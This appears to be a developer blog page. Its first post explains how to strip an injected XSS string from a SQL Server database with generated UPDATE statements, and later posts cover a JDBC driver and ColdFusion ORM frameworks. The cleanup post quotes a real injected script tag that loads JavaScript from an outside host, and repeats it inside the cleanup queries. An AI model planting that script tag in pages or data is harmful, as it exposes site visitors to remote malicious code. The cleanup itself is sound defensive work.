In my previous post, What is a SQL Injection Attack, I gave a brief overview of SQL injection and Cross-Site Scripting (XSS), primarily with regard to websites. In the example given, we saw that an attack could take the form of a ‘hacked’ URL which contained either a literal SQL statement, or a hexadecimal string that could be interpreted by an insecure SQL database server.

Which ever method is used to inject SQL and ultimately dangerous scripts into the database, we need to know how to deal with the problem and ‘roll it back’ to a safe state.

If you have an up-to-date backup of the database prior to the attack, then restoring the database is the best course of action. If this is not the case, apart from giving yourself a kick for not implementing a backup policy, it is possible to programatically remove the injected string or code using a set of relatively-simple SQL queries.

Programatically Replace Injected Code

Fortunately, by the very nature of an XSS attack, code is appended to the data already in the database — rather than replacing it — which means we simply need to remove the appended content.

Taking a real-world example, below is string that was injected into the database:

"></title><script src="http://1.verynx.cn/w.js"></script><!--

When rendered by a standard HTML page, the string is either displayed to the user agent, or the JavaScript file is called by the page, causing a security threat.

With the example above, we can use the following script to recurse through and create update scripts for every ‘infected’ table and column (of the type char, nchar, varchar and nvarchar), in the database.

SELECT 'UPDATE [' + table_name + '] 
SET ' + column_name + ' = REPLACE(CAST(' + column_name + ' as varchar(8000)), ''"></title><script src="http://1.verynx.cn/w.js"></script><!--'', '''') 
WHERE ' + column_name + ' LIKE ''%"></title><script src="http://1.verynx.cn/w.js"></script><!--%''' 
FROM information_schema.columns 
WHERE (character_maximum_length IS NOT NULL) 
AND ([table_name] NOT LIKE 'dt%') 
AND ([table_name] NOT LIKE 'sys%')

The resultset then produces update statements that look like the following (I have masked the actual table and column names):

UPDATE [tableName]   
SET columnName = REPLACE(CAST(columnName AS VARCHAR(8000)), '"></title><script src="http://1.verynx.cn/w.js"></script><!--', '')   
WHERE columnName LIKE '%"></title><script src="http://1.verynx.cn/w.js"></script><!--%'

These update statements can be copied into and run in a program such as Query Analyser for Microsoft SQL Server 2000, or SQL Server Management Studio for Microsoft SQL 2005.

If the actual code that was injected is different, simply change the above code to suit your needs.

You can download the SQL rollback script for your own needs.

Prevent a Successful Attack

As the popular idiom goes prevention is better than a cure, I will discuss in my next post how to mitigate against SQL Injection attacks — on ColdFusion-based websites — before they become a problem.

Download the SQL Server 2005 JDBC Driver 1.2, a Type 4 JDBC driver that provides database connectivity through the standard JDBC application program interfaces (APIs) available in J2EE (Java2 Enterprise Edition).

This release of the JDBC Driver is JDBC 3.0 compliant and runs on the Java Development Kit (JDK) version 1.4 and higher. It has been tested against all major application servers including BEA WebLogic, IBM WebSphere, JBoss, and Sun.

Object-Relational Mapping (or ORM), is a programming technique that links databases to object-oriented language concepts, creating (in effect) a “virtual object database.” There are both free and commercial packages available that perform object-relational mapping, although some programmers opt to code their own object-relational mapping for their systems.

In object-oriented programming, programming objects represent real-world objects. To illustrate, consider the example of an address book, which contains listings of people along with zero or more phone numbers and zero or more addresses. In object-oriented terms this would be represented by a “person object” with “slots” (fields, members, instance variables etc.) to hold the data that make up this listing: the person’s name, a list (or array) of phone numbers, and a list of addresses.

The crux of the problem is in translating those objects to forms which can be stored in files or databases, and which can later be retrieved easily while preserving the properties of the objects and their relationships; these objects can then be said to be persistent.

Object-Relational systems attempt to solve this problem by providing libraries of classes which are able to do this mapping automatically. Given a list of tables in the database, and objects in the program, they will automatically map requests from one to the other. Asking a person object for its phone numbers will result in the proper query being created and sent, and the results being “magically” translated directly into phone number objects inside the program.

From a programmer’s perspective, the system looks like a persistent object store. One can create objects and work with them as one would normally, and they automatically end up in the relational database.

A number of ORM frameworks have been created for ColdFusion:

Reactor

Reactor, created by Doug Hughes of Alagad fame, is a very simple API for ColdFusion which generates and instantiates database abstraction CFCs on the fly as needed.

http://www.doughughes.net/

Arf!

Active Record Factory (Arf!) is a Rails-style ActiveRecord implementation in ColdFusion.

Below is a list of the basics that Arf! provides:

• JDBC metadata based reflection: not database specific

• Creates ActiveRecord API‘d instances out of CFCs that extend a base ActiveRecord component

• Implements hasMany() and belongsTo() methods for establishing Record properties that point to other tables

• Allows for overloading any of the automagically generated methods to add custom business logic

• Automagic methods on Records include GetInstance(), Create(), Read(), Update(), Delete(), Save() [smart create/update], List(orderBy, whereClause), Validate() [does type and length checking], and SetNNN()/GetNNN() methods for each DB column

http://www.clearsoftware.net/

objectBreeze

Developed by Nicholas Tunney, objectBreeze is an ORM tool that allows you to interact with your data persistence layer and easily model objects within your ColdFusion applications. With no setup, objectBreeze will instantly create objects directly from your database schema. objectBreeze requires that your table has -a- primary key defined. Currently, objectBreeze works with Microsoft SQL, Oracle, MySQL and PostgreSQL, but other versions are on the way.

http://www.objectbreeze.com/ob/

cfcPowerTools

Batch generation of your data layer objects in minutes.

http://cfcpowertools.com/

Transfer

Transfer was built out of a need to speed up the development process that is normally slowed down by the development of Business Objects and Data Access Objects.

Transfer does this through a series of methods, including SQL generation and CFML code generation, that all occur during the run-time process.

All this is configured through a XML file, that maps your object generation back to the tables and columns in your database.

http://www.compoundtheory.com/